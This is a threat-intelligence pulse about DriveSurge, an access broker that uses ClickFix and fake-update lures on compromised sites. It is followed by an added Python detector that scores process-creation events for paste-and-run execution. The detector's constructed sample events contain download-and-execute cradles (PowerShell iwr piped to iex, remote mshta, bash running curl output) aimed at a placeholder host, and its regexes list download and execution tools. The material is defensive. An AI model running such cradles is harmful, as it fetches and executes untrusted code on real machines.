Pulse: A New Threat Actor Using ClickFix and Fake Update Drive-By Attacks in Thousands of Compromised Sites
TLP: WHITE | Tags: DriveSurge | Author: AlienVault | Created: 2026-06-01 | Modified: 2026-06-02
Indicators: 34
A threat actor tracked as DriveSurge operates as an Initial Access Broker, selling infections on a Pay-Per-Install basis and delivering malware at scale. The actor compromises thousands of legitimate websites and uses zTDS, a Traffic Distribution System, to silently redirect selected visitors to malicious content. Victims land on one of two lures: FakeUpdates pages that impersonate update prompts for 11 different browsers, or ClickFix pages that present a fake error message and trick the user into pasting and executing a command that the page has already placed on the clipboard. DriveSurge's infrastructure relies on bulletproof hosting and domain registration services, primarily the registrar NiceNIC, and has been active since at least 2015. The campaigns target both Windows and macOS, using heavy obfuscation and clipboard hijacking to get the payload executed. Eight technical fingerprints have been identified for tracking this actor's infrastructure and activity.
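The pulse describes the lure but not what an analyst sees on the endpoint. A ClickFix chain ends with the victim pasting a command into the Windows Run dialog, a PowerShell window or a macOS Terminal, so the durable signal is a script host launched from the user's shell with a download-and-execute cradle on its command line. The detector below is an added example, not code or fingerprints from the pulse or from AlienVault: the event fields are a simplification of Sysmon Event ID 1 / Windows 4688 data, the sample events and hostnames are constructed, and the scored patterns are common ClickFix tradecraft (iwr/irm piped to iex, mshta with a remote URL, bash -c "$(curl ...)"), not DriveSurge's specific commands.

```python
"""Score process-creation events for ClickFix-style paste-and-run execution.

Added example; assumptions (not from the pulse): a ClickFix victim launches a
script host from explorer.exe (Run dialog) or a terminal, and the command line
carries a remote download plus in-memory execution. Sample events and field
names are constructed for this example.
"""
import re

# Script hosts a ClickFix lure typically asks the victim to run.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "bash", "sh", "zsh", "osascript"}
# Parents that mean "a human typed or pasted this" (Run dialog, Terminal, iTerm2).
USER_SHELL_PARENTS = {"explorer.exe", "terminal", "iterm2"}

# (name, pattern, weight): weights are an assumed tuning, not derived from the pulse.
SIGNALS = [
    ("download_cradle",
     re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|"
                r"certutil\s+-urlcache|bitsadmin)\b", re.I), 2),
    ("memory_exec",
     re.compile(r"\b(iex|invoke-expression)\b|\|\s*(ba)?sh\b|\$\(\s*curl|\beval\b", re.I), 3),
    ("hidden_window",
     re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-noni\b", re.I), 1),
    ("remote_url", re.compile(r"https?://\S+", re.I), 1),
    ("mshta_remote", re.compile(r"mshta(\.exe)?\s+(https?|javascript|vbscript):", re.I), 3),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I), 2),
]
THRESHOLD = 6  # assumed cut-off; see the usage note on tuning


def basename(path: str) -> str:
    """Lower-cased final path component, for both Windows and POSIX paths."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, matched signal names) for one process-creation event."""
    score, reasons = 0, []
    if basename(event["image"]) in SCRIPT_HOSTS and basename(event["parent"]) in USER_SHELL_PARENTS:
        score += 2
        reasons.append("script_host_from_user_shell")
    for name, pattern, weight in SIGNALS:
        if pattern.search(event["cmdline"]):
            score += weight
            reasons.append(name)
    return score, reasons


def find_clickfix(events: list[dict], threshold: int = THRESHOLD) -> list[dict]:
    """Events whose score reaches the threshold, with the reasons they matched."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append({"host": event["host"], "score": score,
                         "reasons": reasons, "cmdline": event["cmdline"]})
    return hits


# Constructed sample telemetry (not real data, not from the pulse). example.invalid
# is a reserved name so nothing here resolves.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/x | iex"'},
    {"host": "ws02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/verify"},
    {"host": "ws03", "parent": r"C:\Windows\System32\svchost.exe",  # benign scheduled task
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"host": "mac01", "parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/bash",
     "cmdline": 'bash -c "$(curl -fsSL http://example.invalid/update.sh)"'},
    {"host": "mac02", "parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/usr/bin/curl",  # benign download with no execution step
     "cmdline": "curl -fsSL https://example.invalid/release.tar.gz -o /tmp/release.tar.gz"},
]

if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_EVENTS):
        print(f"{hit['host']}: score={hit['score']} reasons={hit['reasons']}")
        print(f"    {hit['cmdline']}")
```

On the constructed sample, ws01, ws02 and mac01 are flagged while the scheduled-task PowerShell and the bare curl download stay below the cut-off: a download with no execution step scores 3, so the threshold of 6 effectively requires a cradle plus in-memory execution, a remote mshta launch, or a hidden-window download from the Run dialog. The parent check is what separates ClickFix from ordinary admin activity; if your EDR records the Run dialog differently, or users launch PowerShell from a launcher other than explorer.exe, extend USER_SHELL_PARENTS rather than lowering the threshold.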
Indicators of Compromise (2 of 34 total shown)
Indicator types in this pulse: FileHash-MD5, FileHash-SHA1, FileHash-SHA256, IPv4, URL, domain, hostname

Type           Indicator                          Description   Created
FileHash-MD5   0ca424475803a1cb54908a81a00bd93f                 2026-06-01
FileHash-MD5   f3926add1a4531ff324a6acb57d40769                 2026-06-01